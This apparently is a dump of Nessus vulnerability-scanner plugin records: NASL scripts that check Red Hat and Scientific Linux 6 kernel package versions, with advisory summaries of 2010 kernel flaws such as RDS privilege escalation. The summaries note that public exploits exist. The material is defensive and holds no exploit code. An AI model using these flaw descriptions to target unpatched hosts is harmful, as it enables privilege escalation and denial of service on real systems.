script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2010-2803\", \"CVE-2010-2955\", \"CVE-2010-2962\", \"CVE-2010-3079\", \"CVE-2010-3081\", \"CVE-2010-3084\", \"CVE-2010-3301\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3904\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2010:0842\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0842\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-71.7.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"perf-2.6.32-71.7.1.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:47", "description": "This update fixes the following security issues :\n\n - Missing sanity checks in the Intel i915 driver in the Linux kernel could allow a local, unprivileged user to escalate their privileges. (CVE-2010-2962, Important)\n\n - compat_alloc_user_space() in the Linux kernel 32/64-bit compatibility layer implementation was missing sanity checks. This function could be abused in other areas of the Linux kernel if its length argument can be controlled from user-space. On 64-bit systems, a local, unprivileged user could use this flaw to escalate their privileges. (CVE-2010-3081, Important)\n\n - A buffer overflow flaw in niu_get_ethtool_tcam_all() in the niu Ethernet driver in the Linux kernel, could allow a local user to cause a denial of service or escalate their privileges. (CVE-2010-3084, Important)\n\n - A flaw in the IA32 system call emulation provided in 64-bit Linux kernels could allow a local user to escalate their privileges. (CVE-2010-3301, Important)\n\n - A flaw in sctp_packet_config() in the Linux kernel's Stream Control Transmission Protocol (SCTP) implementation could allow a remote attacker to cause a denial of service. (CVE-2010-3432, Important)\n\n - A missing integer overflow check in snd_ctl_new() in the Linux kernel's sound subsystem could allow a local, unprivileged user on a 32-bit system to cause a denial of service or escalate their privileges. (CVE-2010-3442, Important)\n\n - A flaw was found in sctp_auth_asoc_get_hmac() in the Linux kernel's SCTP implementation. When iterating through the hmac_ids array, it did not reset the last id element if it was out of range. This could allow a remote attacker to cause a denial of service.\n (CVE-2010-3705, Important)\n\n - A function in the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation was missing sanity checks, which could allow a local, unprivileged user to escalate their privileges. (CVE-2010-3904, Important)\n\n - A flaw in drm_ioctl() in the Linux kernel's Direct Rendering Manager (DRM) implementation could allow a local, unprivileged user to cause an information leak.\n (CVE-2010-2803, Moderate)\n\n - It was found that wireless drivers might not always clear allocated buffers when handling a driver-specific IOCTL information request. A local user could trigger this flaw to cause an information leak. (CVE-2010-2955, Moderate)\n\n - A NULL pointer dereference flaw in ftrace_regex_lseek() in the Linux kernel's ftrace implementation could allow a local, unprivileged user to cause a denial of service.\n Note: The debugfs file system must be mounted locally to exploit this issue. It is not mounted by default.\n (CVE-2010-3079, Moderate)\n\n - A flaw in the Linux kernel's packet writing driver could be triggered via the PKT_CTRL_CMD_STATUS IOCTL request, possibly allowing a local, unprivileged user with access to '/dev/pktcdvd/control' to cause an information leak.\n Note: By default, only users in the cdrom group have access to '/dev/pktcdvd/control'. (CVE-2010-3437, Moderate)\n\n - A flaw was found in the way KVM (Kernel-based Virtual Machine) handled the reloading of fs and gs segment registers when they had invalid selectors. A privileged host user with access to '/dev/kvm' could use this flaw to crash the host. (CVE-2010-3698, Moderate)\n\nThis update also fixes several bugs.\n\nThe system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2803", "CVE-2010-2955", "CVE-2010-2962", "CVE-2010-3079", "CVE-2010-3081", "CVE-2010-3084", "CVE-2010-3301", "CVE-2010-3432", "CVE-2010-3437", "CVE-2010-3442", "CVE-2010-3698", "CVE-2010-3705", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101110_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60893);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2010-2803\",\n \"CVE-2010-2955\",\n \"CVE-2010-2962\",\n \"CVE-2010-3079\",\n \"CVE-2010-3081\",\n \"CVE-2010-3084\",\n \"CVE-2010-3301\",\n \"CVE-2010-3432\",\n \"CVE-2010-3437\",\n \"CVE-2010-3442\",\n \"CVE-2010-3698\",\n \"CVE-2010-3705\",\n \"CVE-2010-3904\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes the following security issues :\n\n - Missing sanity checks in the Intel i915 driver in the\n Linux kernel could allow a local, unprivileged user to\n escalate their privileges. (CVE-2010-2962, Important)\n\n - compat_alloc_user_space() in the Linux kernel 32/64-bit\n compatibility layer implementation was missing sanity\n checks. This function could be abused in other areas of\n the Linux kernel if its length argument can be\n controlled from user-space. On 64-bit systems, a local,\n unprivileged user could use this flaw to escalate their\n privileges. (CVE-2010-3081, Important)\n\n - A buffer overflow flaw in niu_get_ethtool_tcam_all() in\n the niu Ethernet driver in the Linux kernel, could allow\n a local user to cause a denial of service or escalate\n their privileges. (CVE-2010-3084, Important)\n\n - A flaw in the IA32 system call emulation provided in\n 64-bit Linux kernels could allow a local user to\n escalate their privileges. (CVE-2010-3301, Important)\n\n - A flaw in sctp_packet_config() in the Linux kernel's\n Stream Control Transmission Protocol (SCTP)\n implementation could allow a remote attacker to cause a\n denial of service. (CVE-2010-3432, Important)\n\n - A missing integer overflow check in snd_ctl_new() in the\n Linux kernel's sound subsystem could allow a local,\n unprivileged user on a 32-bit system to cause a denial\n of service or escalate their privileges. (CVE-2010-3442,\n Important)\n\n - A flaw was found in sctp_auth_asoc_get_hmac() in the\n Linux kernel's SCTP implementation. When iterating\n through the hmac_ids array, it did not reset the last id\n element if it was out of range. This could allow a\n remote attacker to cause a denial of service.\n (CVE-2010-3705, Important)\n\n - A function in the Linux kernel's Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity\n checks, which could allow a local, unprivileged user to\n escalate their privileges. (CVE-2010-3904, Important)\n\n - A flaw in drm_ioctl() in the Linux kernel's Direct\n Rendering Manager (DRM) implementation could allow a\n local, unprivileged user to cause an information leak.\n (CVE-2010-2803, Moderate)\n\n - It was found that wireless drivers might not always\n clear allocated buffers when handling a driver-specific\n IOCTL information request. A local user could trigger\n this flaw to cause an information leak. (CVE-2010-2955,\n Moderate)\n\n - A NULL pointer dereference flaw in ftrace_regex_lseek()\n in the Linux kernel's ftrace implementation could allow\n a local, unprivileged user to cause a denial of service.\n Note: The debugfs file system must be mounted locally to\n exploit this issue. It is not mounted by default.\n (CVE-2010-3079, Moderate)\n\n - A flaw in the Linux kernel's packet writing driver could\n be triggered via the PKT_CTRL_CMD_STATUS IOCTL request,\n possibly allowing a local, unprivileged user with access\n to '/dev/pktcdvd/control' to cause an information leak.\n Note: By default, only users in the cdrom group have\n access to '/dev/pktcdvd/control'. (CVE-2010-3437,\n Moderate)\n\n - A flaw was found in the way KVM (Kernel-based Virtual\n Machine) handled the reloading of fs and gs segment\n registers when they had invalid selectors. A privileged\n host user with access to '/dev/kvm' could use this flaw\n to crash the host. (CVE-2010-3698, Moderate)\n\nThis update also fixes several bugs.\n\nThe system must be rebooted for this update to take effect.\");\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=969\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e931e2a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-71.7.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-71.7.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-71.7.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-71.7.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-71.7.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-71.7.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-71.7.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-71.7.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:53:13", "description": "Dan Rosenberg discovered that the RDS network protocol did not correctly check certain parameters. A local attacker could exploit this gain root privileges. (CVE-2010-3904)\n\nAl Viro discovered a race condition in the TTY driver. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2009-4895)\n\nDan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly check file permissions. A local attacker could overwrite append-only files, leading to potential data loss. (CVE-2010-2066)\n\nDan Rosenberg discovered that the swapexit xfs ioctl did not correctly check file permissions. A local attacker could exploit this to read from write-only files, leading to a loss of privacy. (CVE-2010-2226)\n\nSuresh Jayaraman discovered that CIFS did not correctly validate certain response packats. A remote attacker could send specially crafted traffic that would crash the system, leading to a denial of service. (CVE-2010-2248)\n\nBen Hutchings discovered that the ethtool interface did not correctly check certain sizes. A local attacker could perform malicious ioctl calls that could crash the system, leading to a denial of service.\n(CVE-2010-2478, CVE-2010-3084)\n\nJames Chapman discovered that L2TP did not correctly evaluate checksum capabilities. If an attacker could make malicious routing changes, they could crash the system, leading to a denial of service.\n(CVE-2010-2495)\n\nNeil Brown discovered that NFSv4 did not correctly check certain write requests. A remote attacker could send specially crafted traffic that could crash the system or possibly gain root privileges.\n(CVE-2010-2521)\n\nDavid Howells discovered that DNS resolution in CIFS could be spoofed.\nA local attacker could exploit this to control DNS replies, leading to a loss of privacy and possible privilege escalation. (CVE-2010-2524)\n\nDan Rosenberg discovered a flaw in gfs2 file system's handling of acls (access control lists). An unprivileged local attacker could exploit this flaw to gain access or execute any file stored in the gfs2 file system. (CVE-2010-2525)\n\nBob Peterson discovered that GFS2 rename operations did not correctly validate certain sizes. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-2798)\n\nEric Dumazet discovered that many network functions could leak kernel stack contents. A local attacker could exploit this to read portions of kernel memory, leading to a loss of privacy. (CVE-2010-2942, CVE-2010-3477)\n\nSergey Vlasov discovered that JFS did not correctly handle certain extended attributes. A local attacker could bypass namespace access rules, leading to a loss of privacy. (CVE-2010-2946)\n\nTavis Ormandy discovered that the IRDA subsystem did not correctly shut down. A local attacker could exploit this to cause the system to crash or possibly gain root privileges. (CVE-2010-2954)\n\nBrad Spengler discovered that the wireless extensions did not correctly validate certain request sizes. A local attacker could exploit this to read portions of kernel memory, leading to a loss of privacy. (CVE-2010-2955)\n\nTavis Ormandy discovered that the session keyring did not correctly check for
(RHSA-2010:0792) Important: kernel security update
